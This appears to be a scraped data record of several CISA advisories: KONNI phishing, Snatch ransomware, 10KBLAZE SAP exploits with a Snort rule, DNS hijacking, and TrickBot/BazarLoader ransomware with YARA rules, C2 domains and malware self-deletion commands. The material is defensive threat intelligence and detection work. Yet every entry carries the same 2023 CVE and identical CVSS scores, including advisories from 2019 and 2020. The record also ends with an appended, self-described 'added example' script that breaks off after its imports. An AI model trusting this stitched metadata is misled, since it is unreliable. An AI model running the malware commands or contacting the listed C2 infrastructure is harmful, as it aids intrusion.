](<https://attack.mitre.org/versions/v7/software/S0356/>)\n * [MITRE ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>)\n\n### Revisions\n\nAugust 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Phishing Emails Used to Deploy KONNI Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2020-10-24T12:00:00", "id": "AA20-227A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-227a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T12:47:08", "description": "#### Actions to take today to mitigate malicious cyber activity:\n\n 1. Secure and closely monitor Remote Desktop Protocol (RDP).\n 2. Maintain offline backups of data.\n 3. 
Enable and enforce phishing-resistant multifactor authentication (MFA).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2023-09-20T12:00:00", "type": "ics", "title": "#StopRansomware: Snatch Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2023-09-20T12:00:00", "id": "AA23-263A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-263a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T11:17:58", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this activity alert in response to recently disclosed exploits that target unsecure configurations of SAP components. [[1](<https://github.com/comaeio/OPCDE/tree/master/2019/Emirates/\\(SAP\\)%20Gateway%20to%20Heaven%20-%20Dmitry%20Chastuhin%2C%20Mathieu%20Geli>)]\n\n### Technical Details\n\nA presentation at the April 2019 Operation for Community Development and Empowerment (OPCDE) cybersecurity conference describes SAP systems with unsecure configurations exposed to the internet. 
Typically, SAP systems are not intended to be exposed to the internet as it is an untrusted network. Malicious cyber actors can attack and compromise these unsecure systems with publicly available exploit tools, termed \u201c10KBLAZE.\u201d The presentation details the new exploit tools and reports on systems exposed to the internet.\n\n#### SAP Gateway ACL\n\nThe SAP Gateway allows non-SAP applications to communicate with SAP applications. If SAP Gateway access control lists (ACLs) are not configured properly (e.g., gw/acl_mode = 0), anonymous users can run operating system (OS) commands.[[2](<https://wiki.scn.sap.com/wiki/display/SI/Gateway+Access+Control+Lists>)] According to the OPCDE presentation, about 900 U.S. internet-facing systems were detected in this vulnerable condition.\n\n#### SAP Router secinfo\n\nThe SAP router is a program that helps connect SAP systems with external networks. The default `secinfo` configuration for a SAP Gateway allows any internal host to run OS commands anonymously. If an attacker can access a misconfigured SAP router, the router can act as an internal host and proxy the attacker\u2019s requests, which may result in remote code execution.\n\nAccording to the OPCDE presentation, 1,181 SAP routers were exposed to the internet. It is unclear if the exposed systems were confirmed to be vulnerable or were simply running the SAP router service.\n\n#### SAP Message Server\n\nSAP Message Servers act as brokers between Application Servers (AS). By default, Message Servers listen on port 39XX and have no authentication. If an attacker can access a Message Server, they can redirect and/or execute legitimate man-in-the-middle (MITM) requests, thereby gaining credentials. Those credentials can be used to execute code or operations on AS servers (assuming the attacker can reach them). According to the OPCDE presentation, there are 693 Message Servers exposed to the internet in the United States. 
The Message Server ACL must be protected by the customer in all releases.\n\n#### Signature\n\nCISA worked with security researchers from Onapsis Inc.[[3](<https://www.onapsis.com/>)] to develop the following Snort signature that can be used to detect the exploits:\n\nalert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:\"10KBLAZE SAP Exploit execute attempt\"; flow:established,to_server; content:\"|06 cb 03|\"; offset:4; depth:3; content:\"SAPXPG_START_XPG\"; nocase; distance:0; fast_pattern; content:\"37D581E3889AF16DA00A000C290099D0001\"; nocase; distance:0; content:\"extprog\"; nocase; distance:0; sid:1; rev:1;)\n\n### Mitigations\n\nCISA recommends administrators of SAP systems implement the following to mitigate the vulnerabilities included in the OPCDE presentation:\n\n * Ensure a secure configuration of their SAP landscape.\n * Restrict access to SAP Message Server. \n * Review SAP Notes 1408081 and 821875. Restrict authorized hosts via ACL files on Gateways (`gw/acl_mode `and `secinfo`) and Message Servers (`ms/acl_info`).[[4](<https://launchpad.support.sap.com/#/notes/1408081>)], [[5](<https://launchpad.support.sap.com/#/notes/821875>)]\n * Review SAP Note 1421005. Split MS internal/public:` rdisp/msserv=0 rdisp/msserv_internal=39NN`. [[6](<https://launchpad.support.sap.com/#/notes/1421005>)]\n * Restrict access to Message Server internal port (`tcp/39NN`) to clients or the internet.\n * Enable Secure Network Communications (SNC) for clients.\n * Scan for exposed SAP components. 
\n * Ensure that SAP components are not exposed to the internet.\n * Remove or secure any exposed SAP components.\n\n### References\n\n[[1] Comae Technologies: Operation for Community Development and Empowerment (OPCDE) Cybersecurity Conference Materials ](<https://github.com/comaeio/OPCDE/tree/master/2019/Emirates/\\(SAP\\)%20Gateway%20to%20Heaven%20-%20Dmitry%20Chastuhin%2C%20Mathieu%20Geli>)\n\n[[2] SAP: Gateway Access Control Lists ](<https://wiki.scn.sap.com/wiki/display/SI/Gateway+Access+Control+Lists>)\n\n[[3] Onapsis Inc. website ](<https://www.onapsis.com>)\n\n[[4] SAP Note 1408081 ](<https://launchpad.support.sap.com/#/notes/1408081>)\n\n[[5] SAP Note 821875 ](<https://launchpad.support.sap.com/#/notes/821875>)\n\n[[6] SAP Note 1421005 ](<https://launchpad.support.sap.com/#/notes/1421005>)\n\n### Revisions\n\nMay 2, 2019: Initial version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2019-05-03T12:00:00", "type": "ics", "title": "New Exploits for Unsecure SAP Systems", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2019-05-03T12:00:00", "id": "AA19-122A", "href": 
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-122a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T11:18:43", "description": "### Summary\n\nThe National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware of a global Domain Name System (DNS) infrastructure hijacking campaign. Using compromised credentials, an attacker can modify the location to which an organization\u2019s domain name resources resolve. This enables the attacker to redirect user traffic to attacker-controlled infrastructure and obtain valid encryption certificates for an organization\u2019s domain names, enabling man-in-the-middle attacks.\n\nSee the following links for downloadable copies of open-source indicators of compromise (IOCs) from the sources listed in the References section below:\n\n * IOCs (.csv)\n * IOCs (.stix)\n\nNote: these files were last updated February 13, 2019, to remove the following three non-malicious IP addresses:\n\n * 107.161.23.204\n * 192.161.187.200\n * 209.141.38.71\n\n### Technical Details\n\nUsing the following techniques, attackers have redirected and intercepted web and mail traffic, and could do so for other networked services.\n\n 1. The attacker begins by compromising user credentials, or obtaining them through alternate means, of an account that can make changes to DNS records.\n 2. Next, the attacker alters DNS records, like Address (A), Mail Exchanger (MX), or Name Server (NS) records, replacing the legitimate address of a service with an address the attacker controls. This enables them to direct user traffic to their own infrastructure for manipulation or inspection before passing it on to the legitimate service, should they choose. This creates a risk that persists beyond the period of traffic redirection.\n 3. 
Because the attacker can set DNS record values, they can also obtain valid encryption certificates for an organization\u2019s domain names. This allows the redirected traffic to be decrypted, exposing any user-submitted data. Since the certificate is valid for the domain, end users receive no error warnings.\n\n### Mitigations\n\nNCCIC recommends the following best practices to help safeguard networks against this threat:\n\n * Update the passwords for all accounts that can change organizations\u2019 DNS records.\n * Implement multifactor authentication on domain registrar accounts, or on other systems used to modify DNS records.\n * Audit public DNS records to verify they are resolving to the intended location.\n * Search for encryption certificates related to domains and revoke any fraudulently requested certificates.\n\n### References\n\n[Cisco Talos blog: DNSpionage Campaign Targets Middle East ](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>)\n\n[CERT-OPMD blog: [DNSPIONAGE] \u2013 Focus on internal actions](<https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions>)\n\n[FireEye blog: Global DNS Hijacking Campaign: DNS Record Manipulation at Scale ](<https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html>)\n\n[Crowdstrike blog: Widespread DNS Hijacking Activity Targets Multiple Sectors](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors>)\n\n### Revisions\n\nJanuary 24, 2019: Initial version|February 6, 2019: Updated IOCs, added Crowdstrike blog|February 13, 2019: Updated IOCs\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2019-02-13T12:00:00", "type": "ics", "title": "DNS Infrastructure Hijacking Campaign", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2019-02-13T12:00:00", "id": "AA19-024A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-024a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:04:20", "description": "### Summary\n\n**_This advisory was updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection._**\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) version 7 framework. See the [ATT&CK for Enterprise version 7](<https://attack.mitre.org/versions/v7/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThis joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS). 
This advisory describes the tactics, techniques, and procedures (TTPs) used by cybercriminals against targets in the Healthcare and Public Health (HPH) Sector to infect systems with ransomware, notably Ryuk and Conti, for financial gain.\n\nCISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers. CISA, FBI, and HHS are sharing this information to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.\n\nClick here for a PDF version of this report.\n\n#### Key Findings\n\n * CISA, FBI, and HHS assess malicious cyber actors are targeting the HPH Sector with TrickBot and BazarLoader malware, often leading to ransomware attacks, data theft, and the disruption of healthcare services.\n * These issues will be particularly challenging for organizations within the COVID-19 pandemic; therefore, administrators will need to balance this risk when determining their cybersecurity investments.\n\n### Technical Details\n\n### Threat Details\n\nThe cybercriminal enterprise behind TrickBot, which is likely also the creator of BazarLoader malware, has continued to develop new functionality and tools, increasing the ease, speed, and profitability of victimization. These threat actors increasingly use loaders\u2014like TrickBot and BazarLoader (or BazarBackdoor)\u2014as part of their malicious cyber campaigns. Cybercriminals disseminate TrickBot and BazarLoader via phishing campaigns that contain either links to malicious websites that host the malware or attachments with the malware. 
Loaders start the infection chain by distributing the payload; they deploy and execute the backdoor from the command and control (C2) server and install it on the victim\u2019s machine.\n\n#### TrickBot\n\nWhat began as a banking trojan and descendant of Dyre malware, TrickBot now provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. These activities include credential harvesting, mail exfiltration, cryptomining, point-of-sale data exfiltration, and the deployment of ransomware, such as Ryuk and Conti.\n\nIn early 2019, the FBI began to observe new TrickBot modules named Anchor, which cyber actors typically used in attacks targeting high-profile victims\u2014such as large corporations. These attacks often involved data exfiltration from networks and point-of-sale devices. As part of the new Anchor toolset, TrickBot developers created `anchor_dns`, a tool for sending and receiving data from victim machines using Domain Name System (DNS) tunneling.\n\n`anchor_dns` is a backdoor that allows victim machines to communicate with C2 servers over DNS to evade typical network defense products and make their malicious communications blend in with legitimate DNS traffic. `anchor_dns` uses a single-byte `XOR` cipher to encrypt its communications, which have been observed using key `0xB9`. Once decrypted, the string `anchor_dns` can be found in the DNS request traffic.\n\n#### TrickBot Indicators of Compromise\n\nAfter successful execution of the malware, TrickBot copies itself as an executable file with a 12-character randomly generated file name (e.g. 
`mfjdieks.exe`) and places this file in one of the following directories.\n\n * C:\\Windows\\\n * C:\\Windows\\SysWOW64\\\n * C:\\Users\\\\[Username]\\AppData\\Roaming\\\n\nOnce the executable is running and successful in establishing communication with C2s, the executable places appropriate modules downloaded from C2s for the infected processor architecture type (32 or 64 bit instruction set), to the infected host\u2019s `%APPDATA%` or `%PROGRAMDATA%` directory, such as `%AppData\\Roaming\\winapp`. Some commonly named plugins that are created in a Modules subdirectory are (the detected architecture is appended to the module filename, e.g., `importDll32` or `importDll64`):\n\n * `Systeminfo`\n * `importDll`\n * `outlookDll`\n * `injectDll `with a directory (ex. `injectDLL64_configs`) containing configuration files: \n * `dinj`\n * `sinj`\n * `dpost`\n * `mailsearcher` with a directory (ex. `mailsearcher64_configs`) containing configuration file: \n * `mailconf`\n * `networkDll` with a directory (ex. networkDll64_configs) containing configuration file: \n * `dpost`\n * `wormDll`\n * `tabDll`\n * `shareDll`\n\nFilename `client_id` or `data `or `FAQ `with the assigned bot ID of the compromised system is created in the malware directory. Filename `group_tag` or `Readme.md` containing the TrickBot campaign IDs is created in the malware directory.\n\nThe malware may also drop a file named `anchorDiag.txt` in one of the directories listed above.\n\nPart of the initial network communications with the C2 server involves sending information about the victim machine such as its computer name/hostname, operating system version, and build via a base64-encoded `GUID`. The `GUID `is composed of `/GroupID/ClientID/` with the following naming convention:\n\n`/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/`.\n\nThe malware uses scheduled tasks that run every 15 minutes to ensure persistence on the victim machine. 
The scheduled task typically uses the following naming convention.\n\n`[random_folder_name_in_%APPDATA%_excluding_Microsoft]`\n\n`autoupdate#[5_random_numbers] (e.g., Task autoupdate#16876)`.\n\nAfter successful execution, `anchor_dns` further deploys malicious batch scripts (`.bat`) using PowerShell commands.\n\nThe malware deploys self-deletion techniques by executing the following commands.\n\n * `cmd.exe /c timeout 3 && del C:\\Users\\[username]\\[malware_sample]`\n * `cmd.exe /C PowerShell \\\"Start-Sleep 3; Remove-Item C:\\Users\\[username]\\[malware_sample_location]\\\"`\n\nThe following domains found in outbound DNS records are associated with `anchor_dns`.\n\n * `kostunivo[.]com`\n * `chishir[.]com`\n * `mangoclone[.]com`\n * `onixcellent[.]com`\n\nThis malware used the following legitimate domains to test internet connectivity.\n\nCurrently, there is an open-source tracker for TrickBot C2 servers located at <https://feodotracker.abuse.ch/browse/trickbot/>.\n\nThe `anchor_dns` malware historically used the following C2 servers.\n\n#### TrickBot YARA Rules\n\nrule anchor_dns_strings_filenames { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off strings or filenames used in malware\" \nauthor = \"NCSC\" \nhash1 = \"fc0efd612ad528795472e99cae5944b68b8e26dc\" \nhash2 = \"794eb3a9ce8b7e5092bb1b93341a54097f5b78a9\" \nhash3 = \"9dfce70fded4f3bc2aa50ca772b0f9094b7b1fb2\" \nhash4 = \"24d4bbc982a6a561f0426a683b9617de1a96a74a\" \nstrings: \n$ = \",Control_RunDLL \\x00\" \n$ = \":$GUID\" ascii wide \n$ = \":$DATA\" ascii wide \n$ = \"/1001/\" \n$ = /(\\x00|\\xCC)qwertyuiopasdfghjklzxcvbnm(\\x00|\\xCC)/ \n$ = 
/(\\x00|\\xCC)QWERTYUIOPASDFGHJKLZXCVBNM(\\x00|\\xCC)/ \n$ = \"start program with cmdline \\\"%s\\\"\" \n$ = \"Global\\\\\\fde345tyhoVGYHUJKIOuy\" \n$ = \"ChardWorker::thExecute: error registry me\" \n$ = \"get command: incode %s, cmdid \\\"%s\\\", cmd \\\"%s\\\"\" \n$ = \"anchorDNS\" \n$ = \"Anchor_x86\" \n$ = \"Anchor_x64\" \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them \n}\n\nrule anchor_dns_icmp_transport { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off ICMP transport strings\" \nauthor = \"NCSC\" \nhash1 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nstrings: \n$ = \"reset_connection <\\- %s\" \n$ = \"server_ok <\\- %s (packets on server %s)\" \n$ = \"erase successfully transmitted packet (count: %d)\" \n$ = \"Packet sended with crc %s -> %s\" \n$ = \"send data confimation to server(%s)\" \n$ = \"data recived from <\\- %s\" \n$ = \"Rearmost packed recived (id: %s)\" \n$ = \"send poll to server -> : %s\" \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them \n}\n\nrule anchor_dns_config_dexor { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off configuration deobfuscation (XOR 0x23 countup)\" \nauthor = \"NCSC\" \nhash1 = \"d0278ec015e10ada000915a1943ddbb3a0b6b3db\" \nhash2 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nstrings: \n$x86 = {75 1F 56 6A 40 B2 23 33 C9 5E 8A 81 ?? ?? ?? ?? 32 C2 FE C2 88 81 ?? ?? ?? ?? 41 83 EE 01 75 EA 5E B8 ?? ?? ?? ?? C3} \n$x64 = {41 B0 23 41 B9 80 00 00 00 8A 84 3A ?? ?? ?? 
00 41 32 C0 41 FE C0 88 04 32 48 FF C2 49 83 E9 01 75 E7} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\nrule anchor_dns_installer { \nmeta: \ndescription = \"Rule to detect AnchorDNS installer samples based off MZ magic under one-time pad or deobfuscation loop code\" \nauthor = \"NCSC\" \nhash1 = \"fa98074dc18ad7e2d357b5d168c00a91256d87d1\" \nhash2 = \"78f0737d2b1e605aad62af252b246ef390521f02\" \nstrings: \n$pre = {43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00} //CONOUT$ \n$pst = {6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00} //kernel32.dll \n$deob_x86 = {8B C8 89 4D F8 83 F9 FF 74 52 46 89 5D F4 88 5D FF 85 F6 74 34 8A 83 ?? ?? ?? ?? 32 83 ?? ?? ?? ?? 6A 00 88 45 FF 8D 45 F4 50 6A 01 8D 45 FF 50 51 FF 15 34 80 41 00 8B 4D F8 43 8B F0 81 FB 00 ?? ?? ?? 72 CC 85 F6 75 08} \n$deob_x64 = {42 0F B6 84 3F ?? ?? ?? ?? 4C 8D 8C 24 80 00 00 00 42 32 84 3F ?? ?? ?? ?? 48 8D 54 24 78 41 B8 01 00 00 00 88 44 24 78 48 8B CE 48 89 6C 24 20 FF 15 ?? ?? ?? ?? 48 FF C7 8B D8 48 81 FF ?? ?? ?? ?? 
72 B8} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) \nand \n( uint16(@pre+16) ^ uint16(@pre+16+((@pst-(@pre+16))\\2)) == 0x5A4D \nor \n$deob_x86 or $deob_x64 \n) \n}\n\nimport \"pe\" \nrule anchor_dns_string_1001_with_pe_section_dll_export_resolve_ip_domains { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off /1001/ string in combination with DLL export name string, PE section .addr or IP resolution domains\" \nauthor = \"NCSC\" \nhash1 = \"ff8237252d53200c132dd742edc77a6c67565eee\" \nhash2 = \"c8299aadf886da55cb47e5cbafe8c5a482b47fc8\" \nstrings: \n$str1001 = {2F 31 30 30 31 2F 00} // /1001/ \n$strCtrl = {2C 43 6F 6E 74 72 6F 6C 5F 52 75 6E 44 4C 4C 20 00} // ,Control_RunDLL \n$ip1 = \"checkip.amazonaws.com\" ascii wide \n$ip2 = \"ipecho.net\" ascii wide \n$ip3 = \"ipinfo.io\" ascii wide \n$ip4 = \"api.ipify.org\" ascii wide \n$ip5 = \"icanhazip.com\" ascii wide \n$ip6 = \"myexternalip.com\" ascii wide \n$ip7 = \"wtfismyip.com\" ascii wide \n$ip8 = \"ip.anysrc.net\" ascii wide \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) \nand $str1001 \nand ( \nfor any i in (0..pe.number_of_sections): ( \npe.sections[i].name == \".addr\" \n) \nor \n$strCtrl \nor \n6 of ($ip*) \n) \n}\n\nrule anchor_dns_check_random_string_in_dns_response { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off checking random string in DNS response\" \nauthor = \"NCSC\" \nhash1 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nhash2 = \"14e9d68bba7a184863667c680a8d5a757149aa36\" \nstrings: \n$x86 = {8A D8 83 C4 10 84 DB 75 08 8B 7D BC E9 84 00 00 00 8B 7D BC 32 DB 8B C7 33 F6 0F 1F 00 85 C0 74 71 40 6A 2F 50 E8 ?? ?? ?? ?? 
46 83 C4 08 83 FE 03 72 EA 85 C0 74 5B 83 7D D4 10 8D 4D C0 8B 75 D0 8D 50 01 0F 43 4D C0 83 EE 04 72 11 8B 02 3B 01 75 10 83 C2 04 83 C1 04 83 EE 04 73 EF 83 FE FC 74 2D 8A 02 3A 01 75 29 83 FE FD 74 22 8A 42 01 3A 41 01 75 1C 83 FE FE 74 15 8A 42 02 3A 41 02 75 0F 83 FE FF 74 08 8A 42 03 3A 41 03 75 02 B3 01 8B 75 B8} \n$x64 = {4C 39 75 EF 74 56 48 8D 45 DF 48 83 7D F7 10 48 0F 43 45 DF 49 8B FE 48 85 C0 74 40 48 8D 48 01 BA 2F 00 00 00 E8 ?? ?? ?? ?? 49 03 FF 48 83 FF 03 72 E4 48 85 C0 74 24 48 8D 55 1F 48 83 7D 37 10 48 0F 43 55 1F 48 8D 48 01 4C 8B 45 2F E8 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DF 49 03 F7 48 8B 55 F7 48 83 FE 05 0F 82 6A FF FF FF} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\nrule anchor_dns_default_result_execute_command { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off default result value and executing command\" \nauthor = \"NCSC\" \nhash1 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nhash2 = \"14e9d68bba7a184863667c680a8d5a757149aa36\" \nstrings: \n$x86 = {83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00} \n$x64 = {48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 
48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\nrule anchor_dns_pdbs { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off partial PDB paths\" \nauthor = \"NCSC\" \nhash1 = \"f0e575475f33600aede6a1b9a5c14f671cb93b7b\" \nhash2 = \"1304372bd4cdd877778621aea715f45face93d68\" \nhash3 = \"e5dc7c8bfa285b61dda1618f0ade9c256be75d1a\" \nhash4 = \"f96613ac6687f5dbbed13c727fa5d427e94d6128\" \nhash5 = \"46750d34a3a11dd16727dc622d127717beda4fa2\" \nstrings: \n$ = \":\\\\\\MyProjects\\\\\\secondWork\\\\\\Anchor\\\\\\\" \n$ = \":\\\\\\simsim\\\\\\anchorDNS\" \n$ = \":\\\\\\\\[JOB]\\\\\\Anchor\\\\\\\" \n$ = \":\\\\\\Anchor\\\\\\Win32\\\\\\Release\\\\\\Anchor_\" \n$ = \":\\\\\\Users\\\\\\ProFi\\\\\\Desktop\\\\\\data\\\\\\Win32\\\\\\anchor\" \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\n#### BazarLoader/BazarBackdoor\n\nBeginning in approximately early 2020, actors believed to be associated with TrickBot began using BazarLoader and BazarBackdoor to infect victim networks. The loader and backdoor work closely together to achieve infection and communicate with the same C2 infrastructure. Campaigns using Bazar represent a new technique for cybercriminals to infect and monetize networks and have increasingly led to the deployment of ransomware, including Ryuk. BazarLoader has become one of the most commonly used vectors for ransomware deployment.\n\nDeployment of the BazarLoader malware typically comes from phishing email and contains the following:\n\n * Phishing emails are typically delivered by commercial mass email delivery services. 
Email received by a victim will contain a link to an actor-controlled Google Drive document or other free online filehosting solutions, typically purporting to be a PDF file.\n * This document usually references a failure to create a preview of the document and contains a link to a URL hosting a malware payload in the form of a misnamed or multiple extension file.\n * Emails can appear as routine, legitimate business correspondence about customer complaints, hiring decision, or other important tasks that require the attention of the recipient. \n * Some email communications have included the recipient\u2019s name or employer name in the subject line and/or email body.\n\nThrough phishing emails linking users to Google Documents, actors used the below identified file names to install BazarLoader:\n\n * `Report-Review26-10.exe`\n * `Review_Report15-10.exe`\n * `Document_Print.exe`\n * `Report10-13.exe`\n * `Text_Report.exe`\n\nBazar activity can be identified by searching the system startup folders and Userinit values under the `HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon` registry key:\n\n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\adobe.lnk`\n\nFor a comprehensive list of indicators of compromise regarding the BazarLocker and other malware, see <https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html>.\n\n#### Indicators\n\nIn addition to TrickBot and BazarLoader, threat actors are using malware, such as KEGTAP, BEERBOT, SINGLEMALT, and others as they continue to change tactics, techniques, and procedures in their highly dynamic campaign. 
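The AnchorDNS description above gives the `/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/` GUID layout and the C2 domains the malware resolves, and the Recommended Mitigation Measures later in this advisory direct defenders to XOR-decode DNS requests with the key `0xB9` to reveal `Anchor_DNS`. The Python script below is an added example, not code from the advisory or from NCSC/CISA: it applies that decode to DNS log lines and flags queries that carry the GUID or go to a listed C2 domain. The log line format, the assumption that the encoded payload travels as hex-encoded subdomain labels (optionally under one base64 layer, since the advisory says the GUID is sent base64-encoded), the sample computer name and the 32-character string are all constructed for illustration, not observed values.

```python
"""Decode XOR-0xB9 obfuscated DNS query names to surface AnchorDNS beacons.

Added example, not code from the advisory. The key 0xB9, the GUID layout and
the four C2 domains come from the advisory; the log format
("<time> <client> <qname> <qtype>") and the hex-label carrier are assumptions.
"""
import base64
import re

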